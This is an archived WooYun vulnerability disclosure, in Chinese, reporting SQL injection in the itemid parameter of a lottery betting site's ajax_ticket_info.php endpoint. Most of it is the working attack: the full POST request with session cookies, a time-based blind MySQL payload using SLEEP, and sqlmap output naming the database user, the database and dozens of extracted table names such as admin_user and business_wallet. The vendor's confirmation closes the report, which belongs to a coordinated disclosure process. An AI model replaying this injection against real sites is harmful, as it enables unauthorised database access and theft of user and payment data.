乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-26: 细节已通知厂商并且等待厂商处理中 2015-11-27: 厂商已经确认,细节仅向厂商公开 2015-12-07: 细节向核心白帽子及相关领域专家公开 2015-12-17: 细节向普通白帽子公开 2015-12-27: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
RT
http://touzhu.cn/ 投注网
POST /ajaxact/ajax_ticket_info.php HTTP/1.1Content-Length: 141Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://touzhu.cnCookie: PHPSESSID=0i0d8qv1pcg257g3lmtbsgs3f4; helpskaiguan=CaiSo; Hm_lvt_099264dbbc75fb6766d7d0a7155abbcc=1448331169,1448331342,1448331468,1448331677; Hm_lpvt_099264dbbc75fb6766d7d0a7155abbcc=1448331677; HMACCOUNT=3C51B8E09E24C184; box_wxts=on; bdshare_firstime=1448328867470; BAIDUID=59E436C689FE1279BA502F5E6F4883E0:FG=1Host: touzhu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*itemid=*
itemid参数存在注入
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: itemid=' AND (SELECT * FROM (SELECT(SLEEP(5)))ROcc) AND 'Lbdo'='Lbdo---web application technology: PHP 5.4.41back-end DBMS: MySQL 5current user: '[email protected]'current database: 'caiso'current user is DBA: Falseavailable databases [2]:[*] caiso[*] information_schema
表太多了,没有跑完...
[17:18:35] [INFO] adjusting time delay to 1 second due to good response times09[17:18:39] [INFO] retrieved: activity_activities[17:20:09] [INFO] retrieved: activity_activity_detail[17:21:06] [INFO] retrieved: activity_cz_jj[17:21:44] [INFO] retrieved: admin_channel[17:22:47] [INFO] retrieved: admin_class[17:23:14] [INFO] retrieved: admin_friendly_link[17:24:27] [INFO] retrieved: admin_help_center[17:25:33] [INFO] retrieved: admin_permissions[17:26:35] [INFO] retrieved: admin_role[17:27:05] [INFO] retrieved: admin_role_function[17:28:03] [INFO] retrieved: admin_syslogs[17:28:47] [INFO] retrieved: admin_user[17:29:17] [INFO] retrieved: admin_winprize[17:30:08] [INFO] retrieved: business_article[17:31:25] [INFO] retrieved: business_article_category[17:32:24] [INFO] retrieved: business_article_inlink[17:33:18] [INFO] retrieved: business_back_money_request[17:34:58] [INFO] retrieved: business_bonus[17:35:33] [INFO] retrieved: business_chase[17:36:06] [INFO] retrieved: business_chaseitem[17:36:48] [INFO] retrieved: business_city_no[17:37:34] [INFO] retrieved: business_community[17:38:26] [INFO] retrieved: business_company[17:39:01] [INFO] retrieved: business_customer[17:39:49] [INFO] retrieved: business_customer_commission[17:41:05] [INFO] retrieved: business_ema[17:41:42] [ERROR] invalid character detected. retrying..[17:41:42] [WARNING] increasing time delay to 2 secondsil[17:42:00] [INFO] retrieved: business_feedback[17:43:23] [INFO] retrieved: business_filedownlod[17:45:23] [INFO] retrieved: business_league[17:46:38] [INFO] retrieved: business_league_rank[17:48:03] [INFO] retrieved: business_match_arrange[17:50:24] [INFO] retrieved: business_match_arrange_test[17:52:10] [INFO] retrieved: business_match_history[17:53:54] [INFO] retrieved: business_match_mapping[17:55:42] [INFO] retrieved: business_match_team_mapping[17:58:10] [INFO] retrieved: business_mobile[17:59:22] [INFO] retrieved: business_odd[18:00:11] [INFO] retrieved: business_order[18:01:10] [INFO] retrieved: business_order_queue[18:02:40] [INFO] retrieved: business_order_temp[18:03:57] [INFO] retrieved: business_part[18:04:55] [INFO] retrieved:[18:04:57] [INFO] adjusting time delay to 1 second due to good response timesbusiness_partner[18:05:25] [INFO] retrieved: business_pay[18:05:42] [INFO] retrieved: business_pay_out_request[18:07:03] [INFO] retrieved: business_payment_request[18:08:16] [INFO] retrieved: business_plan[18:08:42] [INFO] retrieved: business_plan_item[18:09:21] [INFO] retrieved: business_prize_level[18:10:24] [INFO] retrieved: business_recharge_gift[18:11:39] [INFO] retrieved: business_restricted[18:12:29] [INFO] retrieved: business_sms_log[18:13:19] [INFO] retrieved: business_sms_mo_log[18:14:08] [INFO] retrieved: business_sms_partner[18:14:59] [INFO] retrieved: business_soft_update[18:16:05] [INFO] retrieved: business_supplier[18:16:54] [INFO] retrieved: business_system_param[18:17:57] [INFO] retrieved: business_team[18:18:28] [INFO] retrieved: business_term[18:18:52] [INFO] retrieved: business_term_type_config[18:20:11] [INFO] retrieved: business_ticket[18:20:44] [INFO] retrieved: business_wallet[18:21:27] [INFO] retrieved: business_wallet_log[18:22:07] [INFO] retrieved: business_win_describe_order[18:23:41] [INFO] retrieved: business_win_describe_ticket[18:24:39] [INFO] retrieved: business_win_prize[18:25:21] [INFO] retrieved: business_you_hui_ma[18:26:23] [INFO] retrieved: copy_cat[18:27:03] [INFO] retrieved: event_class[18:28:00] [INFO] retrieved: event_code[18:28:23] [INFO] retrieved: event_give[18:28:54] [INFO] retrieved: event_login[18:29:29] [INFO] retrieved: event_oscar2015[18:30:14] [INFO] retrieved: event_oscar2015_award[18:31:01] [INFO] retrieved: event_oscar2015_items[18:31:44] [INFO] retrieved: event_packet[18:32:19] [INFO] retrieved: event_packet_class[18:33:02] [INFO] retrieved: event_pay[18:33:18] [INFO] retrieved: odds[18:33:42] [INFO] retrieved: s[18:33:53] [ERROR] invalid character detected. retrying..[18:33:53] [WARNING] increasing time delay to 2 secondsessions[18:34:57] [INFO] retrieved: sm_queue[18:36:03] [INFO] retrieved: tz_agent[18:37:30] [INFO] retrieved: tz_agent_discount[18:39:21] [INFO] retrieved: tz_agent_invit[18:40:40] [ERROR] invalid character detected. retrying..[18:40:40] [WARNING] increasing time delay to 3 secondse[18:40:50] [INFO] retrieved: tz_apppay_temp[18:43:49] [INFO] retrieved: tz_balance[18:45:29] [INFO] retrieved: tz_balance_items[18:47:21] [INFO] retrieved: tz_checkmobile[18:49:56] [INFO] retrieved: tz_config[18:51:35] [INFO] retrieved: tz_discou[18:53:26] [ERROR] invalid character detected. retrying..[18:53:26] [WARNING] increasing time delay to 4 secondsnt_plan[18:56:04] [INFO] retrieved: tz_discount_plan_items[18:59:06] [INFO] retrieved: tz_event_pay
求高rank
危害等级:高
漏洞Rank:15
确认时间:2015-11-27 11:01
谢谢.大大关心我们的洞.已经交给程序大叔.
暂无